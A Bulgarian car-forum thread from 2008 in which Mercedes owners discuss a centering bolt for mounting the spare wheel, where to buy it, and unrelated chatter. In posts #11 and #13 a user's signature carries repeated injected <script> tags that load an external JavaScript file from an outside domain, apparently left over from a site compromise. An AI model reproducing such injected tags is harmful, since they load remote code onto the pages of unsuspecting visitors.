Монтаж на гумаКак става монтажа на гумата
Започната от 15W40, 29 яну 2008 - 21:34:14
13 мнения по тази тема
#1
Публикувано 29 януари 2008 - 21:34
Здравейте!
Амбициран от темата за незатегната предна гума (виш ТУК) реших, че този гърч със смяната на резервната гума не може да е измислен от МБ. Та като се зачетох, там пишеше за центриращ болт. Понеже никой познат не се сещаше за нещо подобно, а и спецове не можаха да ми помогнат. Та си купих този болт за 6.28 лв. С него поставянето на гумата става много по-лесно, без нехарактерни пози....
Амбициран от темата за незатегната предна гума (виш ТУК) реших, че този гърч със смяната на резервната гума не може да е измислен от МБ. Та като се зачетох, там пишеше за центриращ болт. Понеже никой познат не се сещаше за нещо подобно, а и спецове не можаха да ми помогнат. Та си купих този болт за 6.28 лв. С него поставянето на гумата става много по-лесно, без нехарактерни пози....
#2
Публикувано 29 януари 2008 - 21:42
Хехехе...аз се чудих за какво е това доста време.Даже мислех,че стария собственик е забравил част от миксер или нещо такова.Мерси,че ми отвори очите
За да минавате за джентълмен,са нужни две неща:винаги да вадите цигарата от устата си,когато се целувате,и никога да не правите забележка на дама,която неправилно носи торба с цимент!
C180 1.8 1996 Classic
C180 1.8 1996 Classic
#3
Публикувано 29 януари 2008 - 21:48
Хехехе...аз се чудих за какво е това доста време.Даже мислех,че стария собственик е забравил част от миксер или нещо такова.Мерси,че ми отвори очите
Пак добре, в мойта кола... само един крик имаше... никакъв комплект оригинални инструменти... та сега събирам едно по едно...
#5
Публикувано 29 януари 2008 - 22:05
Не че е много пари...
Ама до момента никога не съм почуствал нужда от помощни средства та да си туря гумата.
Е, естествено крик и ключ си трябват
Не че не става... само че не е културно изпълнение... а и при минус 5 градуса и без наколенки... всяка джаджа е от полза...
#7
Публикувано 29 януари 2008 - 23:52
Оле мале , и аз се чудех каква е тая чукурма. Когато я забелязах за пръв път в багжника си, в първия момент си помслих че са ми оставили електронно манометърче за налягането на гумите. Увиа като го взех да го разгледам си викам: ебати дефектния манометър, че то няма дисплей за отчитане. Шегувка, не съм толкос тъп, наистина мислех че е манометър ама още като го грабнах видях че е нещо чието предназначение не ми ясно или е било част нещо друго за което също не проумявах какво би могло да е. Ама сега вече знам и тъй като сам си сменям джантите ще ми бъде от полза. Сега тука ще се намери някой да каже- караш мерцедес а сам си сменяш гумите, толкос ли ти свидят 5-6 лева за смяна. Не ми свидят, но в багажника ми се събират само двете 16-ки, и то даже понеже са широки ми опират в говорителите, и не влизат до край в багажника та го връзвах със сезал за да ги закарам миналата година. И трябва да правя два курса, или да си постилам найлон в купето вътре илии да махам задната седалка, все неща кито ме дразнят. За това си ги сменям сам у гаража пък после може да отида на центроване !
#8
Публикувано 30 януари 2008 - 06:56
Моя човек днес го ползва това при смяна на спирачките - колата високо на подемника,само закачаш гумата като прани гащи,удобна работа.
.
#9
Публикувано 30 януари 2008 - 08:40
Ни на една кола не сьм чел тая инструкция.А и не сьм виждал да имам такьв пишляк,днес го мернах обаче,готинко е еле ако ти тежка гумата.
.
#10
Публикувано 30 януари 2008 - 11:23
е хубаво де, ама това го пише в инструкцията на колата, що не четете...
дори и приложената снимка е от инструкцията за експлоатация
Кви инструкции, на мене не ми дадохта упътване с колата. А и да имаше то щеше да е или на ДОЙЧ или на РУСКИ и двата езика не ги кльопам, ако беше на ИНГЛИШ (англииски) по може. Аз даже учих руски 2 години иии почти нищо не разбрах, не знам що тъй ама не ми хареса да го уча, понеже исках да уча немски, обаче училището (елктротехникума в русе) си има твърда политика а тя бе следната: Който в основното е учил англииски, задължително ще изучава като втори чужд РУСКИ, а който е учил в старото си училище руски, немски или друг език ще изучава англииски като втори. Яка логика а, какво ще кажете?
Съжалявам за отклонението от темата ама тя и без това е изчерпана вече !
#11
Публикувано 30 януари 2008 - 20:50
Здравейте!
Амбициран от темата за незатегната предна гума (виш ТУК) реших, че този гърч със смяната на резервната гума не може да е измислен от МБ. Та като се зачетох, там пишеше за центриращ болт. Понеже никой познат не се сещаше за нещо подобно, а и спецове не можаха да ми помогнат. Та си купих този болт за 6.28 лв. С него поставянето на гумата става много по-лесно, без нехарактерни пози....
От къде го купи този болт . Гледам , че цената е прилична , а това е оригинална част.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#12
Публикувано 30 януари 2008 - 22:01
От "Балкан Стар"... но може и от "Ивай Джет"... или видях едно магазинче на Козлодуй, което работи пак с оригинални части... цената е никаква, че да се спори трябва ли му на човек или не... ама всеки си решава...От къде го купи този болт . Гледам , че цената е прилична , а това е оригинална част.
#13
Публикувано 31 януари 2008 - 13:34
Прав си . Няма спор . Благодаря.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#14
Публикувано 31 януари 2008 - 20:08
и аз доста се чудих за къФ ми тая джаджа. дори по едно време си мислех, че с нея се свалят капачките на дупките за крика, ама не съм го пробвал още...
2 потребител(и) четат тази тема
0 потребители, 2 гости, 0 анонимни